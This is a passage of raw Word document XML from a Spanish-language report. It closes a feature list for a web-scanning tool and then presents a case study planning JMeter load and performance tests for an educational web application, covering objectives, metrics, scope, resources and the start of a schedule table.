          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Soporta login para analizar áreas restringidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDB26A5" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="000E6292">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Integración con otras herramientas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6683F4" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Puede usarse junto con </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Metasploit, Nmap o ZAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> para pruebas más profundas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E0CC6D" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Genera informes en </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>HTML, CSV o TXT</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> para su análisis posterior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F78EB" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="000E6292">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Multiplataforma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A15324" w14:textId="4978AD64" w:rsidR="0030013F" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Funciona en </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Linux, Windows (con Cygwin/WSL) y macOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5495C6" w14:textId="2AF2C835" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc196776212"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CASOS DE ESTUDIO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="3EF7727E" w14:textId="179C2DD4" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>USO DE JMETER EN APP WEB EDUCATIVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762B95F6" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Objetivo General</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F0E81B" w14:textId="5D96D2B0" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Implementar un entorno de pruebas de carga y rendimiento utilizando un software para pruebas, orientado a la evaluación integral de la estabilidad, capacidad de respuesta y escalabilidad de aplicaciones web y servicios asociados.</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">El propósito es garantizar que el sistema bajo prueba pueda soportar adecuadamente </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>diferentes volúmenes de usuarios simultáneos, ofreciendo tiempos de respuesta aceptables y un comportamiento estable, aún bajo condiciones extremas de carga.</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>Este entorno permitirá detectar deficiencias en la arquitectura, en la gestión de recursos o en la programación de la aplicación, proporcionando datos valiosos para la mejora continua del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A507D2" w14:textId="7E1D9E5F" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Objetivos Específicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A29EA21" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1. Simular usuarios concurrentes accediendo al sistema bajo prueba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2507C643" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Diseñar y configurar escenarios de prueba que emulen el comportamiento de múltiples usuarios concurrentes, realizando acciones específicas como inicios de sesión, navegación de páginas, consultas de datos o transacciones comerciales.</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>Se busca representar situaciones reales de uso, permitiendo evaluar la respuesta del sistema ante distintas cargas, desde tráfico moderado hasta picos máximos de usuarios simultáneos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364DBCC0" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2. Medir tiempos de respuesta, tasas de error y comportamiento del servidor ante diferentes cargas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4EE55E" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Recolectar y analizar métricas clave durante la ejecución de las pruebas, tales como:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C23C42" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tiempo de respuesta promedio y máximo de las transacciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668EAC81" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tasa de éxito o fallo de las peticiones realizadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7CCCE0" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Consumo de recursos del servidor (memoria, CPU, ancho de banda) si se integra monitoreo externo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CC5216" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tiempos de latencia y throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69761658" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>3. Identificar cuellos de botella y posibles puntos de fallo de la aplicación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72440DA6" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Analizar los resultados de las pruebas para localizar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CC97C9" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Puntos del sistema que presentan altos tiempos de respuesta o fallos frecuentes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE7C4E0" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Componentes de la infraestructura (servidores, bases de datos, redes) que limitan el rendimiento general.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C788A75" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Funciones específicas de la aplicación que no escalan adecuadamente al aumentar la carga.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1764967A" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08ED9659" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D26AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alcance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAD8783" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Realizar pruebas de carga sobre aplicaciones web (HTTP/HTTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25346264" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Evaluar APIs RESTful mediante peticiones configuradas en nuestro software de pruebas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AF59D6" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Simular diferentes escenarios de tráfico: carga moderada y carga alta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131659D6" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>No incluye optimización directa del sistema, solo la entrega de reportes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B811A37" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D26AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recursos necesarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D7A805" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D26AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Software</w:t>
      </w:r>
      <w:r w:rsidRPr="003D26AD">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26557AD8" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Herramienta desarrollada software de pruebas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38567EB2" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D26AD">
        <w:t>JDK 8 o superior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6947556B" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D26AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hardware</w:t>
      </w:r>
      <w:r w:rsidRPr="003D26AD">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A4D325" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Computadora con mínimo 8GB RAM, CPU 4 núcleos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E451425" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D26AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Personal</w:t>
      </w:r>
      <w:r w:rsidRPr="003D26AD">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B22CA40" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D26AD">
        <w:t>1 Ingeniero QA/Test Engineer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B5C800" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D26AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Otros</w:t>
      </w:r>
      <w:r w:rsidRPr="003D26AD">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C67E2C" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Acceso a servidor bajo prueba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E30D1E" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Scripts de prueba (opcional si se requiere automatización).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7AF50A" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablanormal1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3382"/>
        <w:gridCol w:w="1112"/>
        <w:gridCol w:w="1690"/>
        <w:gridCol w:w="1448"/>
      </w:tblGrid>
      <w:tr w:rsidR="0030013F" w:rsidRPr="003D26AD" w14:paraId="20CA13D0" w14:textId="77777777" w:rsidTr="00915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762DD" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003D26AD">
              <w:t>Actividad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42389725" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003D26AD">
              <w:t>Duración</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="100B3EA3" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003D26AD">
              <w:t>Fecha de Inicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A6E9EAD" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003D26AD">
              <w:t>Fecha de Fin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="003D26AD" w14:paraId="5C59CF01" w14:textId="77777777" w:rsidTr="0091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6D88D" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003D26AD">
              <w:t>Instalación y configuración</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B8E3F5D" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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rsidRPr="003D26AD">
              <w:t>1 día</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
